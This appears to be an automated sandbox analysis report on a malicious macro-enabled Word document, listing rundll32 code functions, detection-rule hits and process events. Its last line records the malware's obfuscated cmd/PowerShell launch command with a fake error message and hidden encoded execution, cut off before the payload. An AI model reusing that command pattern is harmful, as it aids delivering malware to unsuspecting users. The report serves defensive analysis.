                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287D0310_2_00287D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028511B10_2_0028511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00288D1C10_2_00288D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00285D1D10_2_00285D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027B11210_2_0027B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287F1F10_2_00287F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00282B1610_2_00282B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00280B6810_2_00280B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027C76910_2_0027C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027E37710_2_0027E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028177310_2_00281773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00275B7910_2_00275B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00278F7810_2_00278F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028234910_2_00282349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00288F4910_2_00288F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00289B4510_2_00289B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027675410_2_00276754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027B75F10_2_0027B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002873AC10_2_002873AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002769A010_2_002769A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002717AC10_2_002717AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002861B810_2_002861B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00286DB910_2_00286DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028878F10_2_0028878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027F98C10_2_0027F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028958610_2_00289586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00276D9F10_2_00276D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027839D10_2_0027839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027799810_2_00277998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002867E910_2_002867E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002871EF10_2_002871EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002831E210_2_002831E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027D7EB10_2_0027D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283FE710_2_00283FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00281BDF10_2_00281BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00279FDC10_2_00279FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AB41F11_2_001AB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AEE7811_2_001AEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A2C6311_2_001A2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B389511_2_001B3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A568E11_2_001A568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B42DA11_2_001B42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B02C311_2_001B02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AC0C611_2_001AC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A873611_2_001A8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B4B4111_2_001B4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A7B6311_2_001A7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B63C111_2_001B63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B340A11_2_001B340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B7A0F11_2_001B7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A2A3011_2_001A2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A9A3711_2_001A9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A4A3511_2_001A4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AE05A11_2_001AE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AEA4C11_2_001AEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AF44411_2_001AF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B687F11_2_001B687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B5A6111_2_001B5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B889D11_2_001B889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A128011_2_001A1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A80BA11_2_001A80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A60B911_2_001A60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A48BD11_2_001A48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BA0AF11_2_001BA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A62A311_2_001A62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B8ADC11_2_001B8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A96CD11_2_001A96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B20C511_2_001B20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A1CFA11_2_001A1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B26F511_2_001B26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B12E211_2_001B12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A88E511_2_001A88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B511B11_2_001B511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B7F1F11_2_001B7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B5D1D11_2_001B5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B8D1C11_2_001B8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AB11211_2_001AB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B2B1611_2_001B2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B0F0C11_2_001B0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B7D0311_2_001B7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001ABB3A11_2_001ABB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A153C11_2_001A153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B0D3311_2_001B0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AF53611_2_001AF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AB75F11_2_001AB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A675411_2_001A6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B234911_2_001B2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B8F4911_2_001B8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B9B4511_2_001B9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A8F7811_2_001A8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A5B7911_2_001A5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B177311_2_001B1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AE37711_2_001AE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AC76911_2_001AC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B0B6811_2_001B0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A799811_2_001A7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A6D9F11_2_001A6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A839D11_2_001A839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B878F11_2_001B878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AF98C11_2_001AF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B958611_2_001B9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B6DB911_2_001B6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B61B811_2_001B61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A17AC11_2_001A17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B73AC11_2_001B73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A69A011_2_001A69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B1BDF11_2_001B1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001A9FDC11_2_001A9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001AD7EB11_2_001AD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B67E911_2_001B67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B71EF11_2_001B71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B31E211_2_001B31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B3FE711_2_001B3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C2C6312_2_006C2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CEE7812_2_006CEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CB41F12_2_006CB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CC0C612_2_006CC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D02C312_2_006D02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D42DA12_2_006D42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C568E12_2_006C568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D389512_2_006D3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C7B6312_2_006C7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D4B4112_2_006D4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C873612_2_006C8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D63C112_2_006D63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D5A6112_2_006D5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D687F12_2_006D687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CEA4C12_2_006CEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CF44412_2_006CF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CE05A12_2_006CE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C4A3512_2_006C4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C9A3712_2_006C9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C2A3012_2_006C2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D7A0F12_2_006D7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D340A12_2_006D340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C88E512_2_006C88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D12E212_2_006D12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C1CFA12_2_006C1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D26F512_2_006D26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C96CD12_2_006C96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D20C512_2_006D20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D8ADC12_2_006D8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006DA0AF12_2_006DA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C62A312_2_006C62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C48BD12_2_006C48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C60B912_2_006C60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C80BA12_2_006C80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C128012_2_006C1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D889D12_2_006D889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CC76912_2_006CC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D0B6812_2_006D0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C8F7812_2_006C8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C5B7912_2_006C5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CE37712_2_006CE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D177312_2_006D1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D234912_2_006D2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D8F4912_2_006D8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D9B4512_2_006D9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CB75F12_2_006CB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C675412_2_006C6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C153C12_2_006C153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CBB3A12_2_006CBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CF53612_2_006CF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D0D3312_2_006D0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D0F0C12_2_006D0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D7D0312_2_006D7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D5D1D12_2_006D5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D8D1C12_2_006D8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D7F1F12_2_006D7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D511B12_2_006D511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D2B1612_2_006D2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CB11212_2_006CB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D71EF12_2_006D71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D67E912_2_006D67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CD7EB12_2_006CD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D3FE712_2_006D3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D31E212_2_006D31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C9FDC12_2_006C9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D1BDF12_2_006D1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C17AC12_2_006C17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D73AC12_2_006D73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C69A012_2_006C69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D6DB912_2_006D6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D61B812_2_006D61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CF98C12_2_006CF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D878F12_2_006D878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D958612_2_006D9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C839D12_2_006C839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C6D9F12_2_006C6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C799812_2_006C7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EB41F13_2_001EB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EEE7813_2_001EEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E2C6313_2_001E2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F389513_2_001F3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E568E13_2_001E568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F42DA13_2_001F42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EC0C613_2_001EC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F02C313_2_001F02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E873613_2_001E8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F4B4113_2_001F4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E7B6313_2_001E7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F63C113_2_001F63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F7A0F13_2_001F7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F340A13_2_001F340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E9A3713_2_001E9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E4A3513_2_001E4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E2A3013_2_001E2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EE05A13_2_001EE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EEA4C13_2_001EEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EF44413_2_001EF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F687F13_2_001F687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F5A6113_2_001F5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F889D13_2_001F889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E128013_2_001E1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E48BD13_2_001E48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E80BA13_2_001E80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E60B913_2_001E60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FA0AF13_2_001FA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E62A313_2_001E62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F8ADC13_2_001F8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E96CD13_2_001E96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F20C513_2_001F20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E1CFA13_2_001E1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F26F513_2_001F26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E88E513_2_001E88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F12E213_2_001F12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F7F1F13_2_001F7F1F
                      Source: pack-91089 416755919.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_openName: Document_open
                      Source: pack-91089 416755919.docOLE indicator, VBA macros: true
                      Source: 00000005.00000002.2104426345.0000000000356000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2104546629.0000000001CC6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@24/8@7/5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00221C88 CreateToolhelp32Snapshot,14_2_00221C88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,7_2_10002D70
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ck-91089 416755919.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD1FE.tmpJump to behavior
                      Source: pack-91089 416755919.docOLE indicator, Word Document stream: true
                      Source: pack-91089 416755919.docOLE document summary: title field not present or empty
                      Source: pack-91089 416755919.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ..%.........J........................... .#.......#.....................................#.........................%.....h.......5kU.............Jump to behavior
                      Source: C:\Windows\System32\msg.exeConsole Write: ............J...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......H.......L.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......H.U.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.....................N.j....................................}..v.....k......0.................%.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................N.j..... ..............................}..v....(l......0...............H.U.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.....................N.j....................................}..v.....x......0.................%.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................N.j....(.U.............................}..v.....y......0.................U.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....#................M.j....................................}..v....(.......0.................%.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................M.j..... ..............................}..v............0.................U.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'................H.j....E...............................}..v....8G......0...............(.U.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+................H.j....E...............................}..v............0...............(.U.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: pack-91089 416755919.docVirustotal: Detection: 36%
                      Source: pack-91089 416755919.docReversingLabs: Detection: 43%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 